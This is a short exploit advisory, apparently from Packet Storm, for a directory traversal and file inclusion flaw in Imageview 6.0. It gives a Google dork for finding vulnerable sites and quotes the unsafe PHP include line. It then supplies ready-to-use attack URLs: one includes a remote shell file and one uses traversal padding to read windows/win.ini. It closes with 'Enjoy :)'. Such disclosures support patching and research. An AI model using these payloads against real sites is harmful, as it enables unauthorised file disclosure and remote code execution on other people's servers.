Imageview version 6.0 suffers from a directory traversal vulnerability.
262d1ece9a7414af4ee075eddfb0dbefc8b9f3c934e1df735fa2c92d50584cd5##########################################################
# Exploit Title: Imageview v6.0 Remote [and] Local Directory Traversal Vulnerability
# Google Dork: inurl:"/imageview6/"
# home : www.D99Y.com
# Date: 27/2/2011
# Author: Difficult 511
# Software Link: http://www.blackdot.be/files/downloads/imageview6-install.zip
# Version: 6.0
# Tested on: windows xp sp2
##########################################################
#
# file :
#
# admin/index.php
#
# exploit [ Remote ] :
#
# http://localhost/imageview6/admin/index.php?page= [shell.txt]
#
# Code :
#
#<?php include('pages/'.$_GET['page'].'.php'); ?>
#
# exploit [ Local ] :
#
# http://localhost/imageview6/admin/index.php?page=unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
#
# Now see the file : /windows/win.ini
#
# And see Page ;)
#
##########################################################
Greetz :
NassRawI and all members D99Y.com
Enjoy :)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed